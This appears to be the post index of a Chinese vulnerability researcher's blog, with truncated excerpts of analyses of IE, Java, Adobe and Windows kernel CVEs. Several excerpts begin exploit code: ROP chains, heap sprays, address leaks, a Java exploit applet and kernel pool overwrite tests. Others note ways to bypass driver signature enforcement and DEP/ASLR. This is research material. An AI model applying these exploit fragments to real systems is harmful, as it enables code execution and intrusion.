爱杀之爪的矩阵

原创 ms10_046_shortcut_icon_dllloader 这个其实很好用

原创 MSVCRT:ROP - CN 修改ROP检测标志

function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009

原创 openjdk windows 编译

前记 如果你不是闲着蛋疼最好不要在windows上面编译，linux上面一会就编译好了。。。。可是windows上面  只想说10个字“尼玛” 出现问题了  可以直接改他的makefile和gmk 爷爷的 例如那个verify.res 啥的 明明没有 他非要加入link 中，导致编译失败 感叹 人生太多的时间花费在这些虽然结果有用，但是过程无用的地方了

原创 Well-known DEP-violating thunks

这几天调试发现一个奇怪的现象，一个在数据区段执行的指令，在开启了系统dep时竟然还可以继续执行，换成其他指令就不可以，而且执行时这个内存属性仍旧是不可执行属性。同时按理指令是一条一条执行，但是这个指令的执行是跳跃了，瞬间差点毁了多年的指令执行三观。debugwin7+system dep openBreakpoint 0 hiteax=2e81e

原创 肉眼挖啊挖

蛋疼 待验证.text:1000C855 cycle_big: ; CODE XREF: sus_sub_1000C520+3D2j.text:1000C855 push 1.text:1000C857 mov ecx, ebx.text:1000

原创 权限提升

普通权限在不需要任何验证即启动了一个高级别权限的进程 本身就存在了很大的风险。权限存在交互 就很容易导致问题

原创 CVE-2013-0636

http://www.adobe.com/support/security/bulletins/apsb13-06.html

原创 当前多数杀软主防存在的缺陷

见 链接   http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1

原创 乱猜

http://bbs.360safe.com/thread-111959-1-1.htmliocode 0x222020 .text:000110C6 ; int __stdcall sub_110C6(int processid).text:000110C6 sub_110C6       proc near               ; CODE XREF:

原创 WIN7-8 签名

http://linuxch.org/poc2012/MJ0011,Using%20a%20Patched%20Vulnerability%20to%20Bypass%20Windows%208%20x64%20Driver%20Signature%20Enforcement.pdf随便找个有漏洞的签名sys，然后在win8 win7下加载然后不就可以过签名了嘛比如

原创 ie 0day 分析

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

原创 cve-2012-1876 win7_ie8_leak_shellcode code

alert("begin")//var div_container = document.getElementById("test");//div_container.style.cssText = "display:none";var cloned = new Array();var selob = document.createElement("select");selob.w0

原创 cve2012-1876 leak mshtml base address and leak shellcode base address

leak mshtml base address leak shellcode base address其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003

原创 CVE2012-1723 Java Field Bytecode Verifier Cache RCE分析

漏洞分析http://www.binvul.com/viewthread.php?tid=134&extra=page%3D1

原创 chrome 插件的一处bug crash

https://code.google.com/p/chromium/issues/detail?id=127720&thanks=127720&ts=1336704072

原创 cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞

引用http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/ 漏洞poc  漏洞原理： Applet有2个标签参数，codebase和code，c

原创 没有ASLR的几个DLL

DpoFeedb.dll        指纹识别 现在买的笔记本都有MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了VBE7INTL.DLL    未找到加载方式迅雷                 mcvcr71.dlljava6                 mcvcr71.dllcomct232.ocx      需要用户点一次允许 之后就不需要了com

原创 失之交臂的 cve 2012-0181

1: kd> pwin32k!ReadLayoutFile+0x123:bf89edb7 7407            je      win32k!ReadLayoutFile+0x12c (bf89edc0)1: kd> pwin32k!ReadLayoutFile+0x125:bf89edb9 0fb703          movzx   eax,word ptr [

原创 cve2012-1889 ie8 rop

采用inking 大牛的方法function exploit(){obj = document.getElementById('oo').object;var src = unescape("%u0c0c%u0c0c");while (src.length < 0x1002) src += src;src = "\\\\xxx" + src;src = src.subs

原创 vm 快照快速分析堆类型漏洞

先选择一个虚拟机快照的分析开始点，这个点要把握好，堆的布局基本定了，不再改变然后直接运行poc，在崩溃地方，下这个断点Flash11e+0x5261c0:022> u Flash11e+0x5261cFlash11e+0x5261c:053c261c 8bb614050000    mov     esi,dword ptr +0x513 (00000514)[es

原创 HP_imc 5.1_E0202 imf.dll recv packets integer overflow

imf.dll版本 HP_iMC_PLAT_5.1_E0202_Standard_Windows_HP_iMC_PLAT_5.1_E0202_Standard_Windows漏洞汇编代码：.text:003B4083                 mov     ecx, [esi+38h].text:003B4086                 mov     eax, [ecx+eb

原创 vul_sample

wchar_t * copy_data(wchar_t * string){ wchar_t *sep,*new1; int size=32 *sizeof(wchar_t); new1 =(wchar_t *)malloc(size); *new1='\0'; if (*string!='/') { wcscpy(new1,L"/"); size-=sizeof(wchar

原创 java 漏洞调试科普

Java 漏洞调试科普Cve2010-0840 author : instruder 介绍以cve2010-0840的Java Runtime Environment Trusted Methods Chaining Remote CodeExecution Vulnerability漏洞为例，介绍下如何调试java漏洞。 这个漏洞影响的java版本 Jre

原创 cve 2010-0842 Oracle Java MixerSequencer Object GM_Song Structure Handling Vulnerability

cve 2010-0842Oracle Java MixerSequencer Object GM_Song Structure Handling Vulnerability 分析没啥难度这个…目的不在分析，呵呵 Instruderversion： jre 6u18  设置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT

原创 HP 3COM/H3C Intelligent Management 几个 Luigi Auriemma发现的cve漏洞

这个 Luigi Auriemma 大牛 挖各种远程开端口软件的漏洞啊 ,牛叉...没事看下他挖的几个关于HP 3COM/H3C Intelligent Management 的漏洞 ，不用补丁对比，自己跟着看了一遍，当然了  是猜测 并不一定正确。CVE-2011-1851.text:0040AA05 loc_40AA05:

原创 Cve2012-0507 简单分析

Cve2012-0507分析 影响版本Jre update 30 before  触发漏洞代码 public class Exploit extends Applet{  publicvoid init()  {    try    {//manually constructing aserialized object      by

原创 一顿饭吃一两斤肉和一顿饭吃几百斤肉

明白了一样事情 一顿饭吃一两斤肉不能说明问题，但是一顿饭吃几百斤肉就能说明问题了 前者只是大众的水平，后者才是大师级的水平记次勉励！

原创 程序安装路径的潜在威胁

额 程序是不能安装在根目录的啊 千万啊例如python，直接安装在c盘根目录，尤其是服务器这样做，风险很大，很容易导致提权......最近在看一本书，据说是神书！we can do anything！

原创 由 MS12-005 : 嵌入式对象任意代码执行引发的思考

http://blog.vulnhunt.com/index.php/2012/03/24/thinking_about-ms12-005/

原创 ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

/*Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack VulnerabilityDate: 2012-3-25Author: instruderSoftware Link: http://www.allplayer.org/zh/download/allplayerVersion: ALLPlayerEN 5.0Teste

原创 KERNEL POOL LIST ENTRY OVERWRITE ATTACK

KERNEL POOL LISTENTRY OVERWRITE ATTACK  LIST_ENTRY OVERWRITE 原理图 测试代码:Sys： VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer){ PVOIDpatdbuffer=NULL,p

原创 创建个和System 名一样的进程

void proess_test(){printf("process_test\n");STARTUPINFO si;PROCESS_INFORMATION pi;WCHAR szCmdline[]={L"System."};ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( &pi, sizeo

原创 CVE-2012-0759 Adobe Shockwave Player Director File Parsing KEY ATOM Pointer Overwrite

Discover: instruder of code audit labs of vulnhunt.comCAL: CAL-2011-0055CVE: CVE-2012-07591 Affected Products=================Test Version：Adobe Shockeave Player 11.6.3.633Adobe Shoc

原创 CVE-2012-0758 Adobe Shockwave Player Parsing cupt atom heap overflow

Discover: instruder of code audit labs of vulnhunt.comCAL: CAL-2011-0071CVE: CVE-2012-07581 Affected Products=================adobe shockwave 11.6.3.633adobe Shockwave 11.6.1.629 and p

原创 codeblocks ide for linux

我擦  经yourstar推荐 linux下的codeblocks果然是一个很好的ide 开发工具啊 之前写代码一直是用gtext，自己写makefile 那个纠结。。。。ubuntu下安装codeblockssudo apt-get install codeblocks 搞定。。跟vs2005的界面菜单啥的优点类似

原创 看adobe sandbox的一点想法

adobe pdf的sandbox貌似是不会限制socket的，某技术paper上面说的这样感觉可以利用第三方程序的本地socket的漏洞来绕过sandbox。例如某某播放软件本地开了一个127.0.0.1的链接，存在溢出漏洞，这样假如你有了pdf的漏洞后，执行shellcode后，在和本地链接通信，从而再次溢出第三方程序，从而在第三方陈程序的进程空间执行任意代码，

原创 漏洞分析----非常给力的方法----虚拟机快照

大家都知道在进行漏洞分析时，对于内存破坏或者其他很难定位类型的漏洞分析中，一个很难解决的就是数据的逆向溯源，等找到源头之后，大都就知道漏洞触发的原因了 可以用虚拟机快照来解决这个问题，发现无论是r3下面的漏洞分析还是内核的漏洞，都非常给力啊  在分析的开始，就保存一个虚拟机快照，每次重新分析时，就直接恢复快照，因为知道了 堆的地址，可以直接下堆的访问断点等，就算当前

原创 分析ms11-80 poc某些细节

NtQueryIntervalProfile函数是为了触发shellcode的执行eax=b25c9d14 ebx=80618501 ecx=00000000 edx=0021fb0c esi=00bcd968 edi=b25c9d64eip=80646d91 esp=b25c9d04 ebp=b25c9d20 iopl=0         nv up ei pl nz na pe nc

原创 A.Bug.Hunters.Diary.A.Guided.Tour.Through.the.Wilds.of.Software.Security 笔记

一 kernel 漏洞 的空指针引用 利用1. Trigger the NULL pointer dereference for a denial of service.2. Use the zero page to get control over EIP/RIP.第三章那个内核漏洞的利用真是经典啊二  开源系统的系统驱动漏洞查找  Step 1: List the

原创 CVE-2011-2448 Adobe ShockwaveDirector File Parsing data of rcsl chunk multiple DOS vulnerabilities

Adobe Shockwave Player Director File Parsing data of rcsl chunk multiple DOS vulnerabilitiesCAL_ID: CAL-2011-0054CVE ID: CVE-2011-2448Discover: instruder of code audit labs of vulnhunt.comhttp